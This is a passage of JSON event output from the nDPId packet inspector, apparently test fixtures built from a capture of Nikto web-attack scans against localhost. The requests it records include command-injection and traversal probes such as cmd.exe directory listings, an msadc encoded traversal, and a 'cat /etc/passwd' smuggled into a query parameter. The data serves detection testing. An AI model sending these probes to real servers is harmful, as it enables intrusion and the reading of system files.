+00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":1,"flow_last_seen":1576420277516,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277516,"pkt":"AAAAAAAAAAAAAAAACABFAADO6rNAAEAGUXR\/AAABfwAAAcWyH5BduNJTZLl5JoAYAED+wgAAAQEICp1m\/jSdZv40R0VUIC9zZXJ2bGV0L1NjaGVkdWxlclRyYW5zZmVyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAzNDUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277516,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000345)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7560000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420277518,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":1,"flow_last_seen":1576420277518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":1576420277518,"pkt":"AAAAAAAAAAAAAAAACABFAADWgsZAAEAGuVl\/AAABfwAAAcW0H5A6eLoo9CriDoAYAED+ygAAAQEICp1m\/jWdZv41R0VUIC9zZXJ2bGV0L3N1bmV4YW1wbGVzLkJCb2FyZFNlcnZsZXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDM0NikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7560000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420277518,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/sunexamples.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000346)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277519,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":1,"flow_last_seen":1576420277519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277519,"pkt":"AAAAAAAAAAAAAAAACABFAADPVxFAAEAG5RV\/AAABfwAAAcW2H5BSXG\/tRc4oyoAYAED+wwAAAQEICp1m\/jedZv43R0VUIC9zZXJ2bGV0cy9TY2hlZHVsZXJUcmFuc2ZlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDM0NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277519,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlets\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000347)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7560000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420277520,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":1,"flow_last_seen":1576420277520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1576420277520,"pkt":"AAAAAAAAAAAAAAAACABFAADMFYpAAEAGJqB\/AAABfwAAAcW4H5AzUC1t6XmH4oAYAED+wAAAAQEICp1m\/jidZv44R0VUIC9wZXJsLy1lJTIwcHJpbnQlMjBIZWxsbyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMzUyKQ0KDQo="} +01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7560000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420277520,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20print%20Hello","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000352)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7560000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277522,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":1,"flow_last_seen":1576420277522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":1576420277522,"pkt":"AAAAAAAAAAAAAAAACABFAADYfsdAAEAGvVZ\/AAABfwAAAcW6H5DDSkYijR1boIAYAED+zAAAAQEICp1m\/jqdZv46R0VUIC9jL3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyKy9PRyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDQ5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01086{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7560000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277522,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c\/winnt\/system32\/cmd.exe?\/c+dir+\/OG","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000491)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7560000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277525,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":1,"flow_last_seen":1576420277525,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277525,"pkt":"AAAAAAAAAAAAAAAACABFAAD8VQBAAEAG5vl\/AAABfwAAAcW8H5BNImwcgJPNrYAYAED+8AAAAQEICp1m\/j2dZv48R0VUIC9tc2FkYy8uLiUyNTVjLi4vLi4lMjU1Yy4uLy4uJTI1NWMuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpcitjOiU1YyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwNDk0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7560000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277525,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000494)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7560000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277526,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":1,"flow_last_seen":1576420277526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277526,"pkt":"AAAAAAAAAAAAAAAACABFAAD8wPBAAEAGewl\/AAABfwAAAcW+H5C+lvgMjxfu9IAYAED+8AAAAQEICp1m\/j6dZv4+R0VUIC9tc2FkYy8uLiUyNTVjLi4vLi4lMjU1Yy4uLy4uJTI1NWMuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpcitjOiU1YyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDQ5NSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7560000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277526,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000495)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277527,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":1,"flow_last_seen":1576420277527,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277527,"pkt":"AAAAAAAAAAAAAAAACABFAADOGxtAAEAGIQ1\/AAABfwAAAcXAH5ABqiP992RjDoAYAED+wgAAAQEICp1m\/j+dZv4\/R0VUIC9tc2FkYy9zYW1wbGVzL2FkY3Rlc3QuYXNwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwNDk2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277527,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/samples\/adctest.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000496)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277528,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":1,"flow_last_seen":1576420277528,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420277528,"pkt":"AAAAAAAAAAAAAAAACABFAADdW\/pAAEAG4B5\/AAABfwAAAcXCH5D1lWMf6eFgloAYAED+0QAAAQEICp1m\/kCdZv5AR0VUIC9hdGhlbmFyZWcucGhwP3Bhc3M9JTIwO2NhdCUyMC9ldGMvcGFzc3dkIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDA2NjcpDQoNCg=="} +01088{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277528,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/athenareg.php?pass=%20;cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000667)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277534,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":1,"flow_last_seen":1576420277534,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277534,"pkt":"AAAAAAAAAAAAAAAACABFAADO4OJAAEAGW0V\/AAABfwAAAcXEH5B2FdgIExVLAoAYAED+wgAAAQEICp1m\/kWdZv5FR0VUIC9jZC1jZ2kvc3NjZF9zdW5jb3VyaWVyLnBsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDY3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277534,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cd-cgi\/sscd_suncourier.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001067)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277535,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":1,"flow_last_seen":1576420277535,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277535,"pkt":"AAAAAAAAAAAAAAAACABFAADEalJAAEAG0d9\/AAABfwAAAcXGH5Ak\/VK4qoIqcIAYAED+uAAAAQEICp1m\/kedZv5HR0VUIC9jZ2ktYmluL2hhbmRsZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA2OSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277535,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 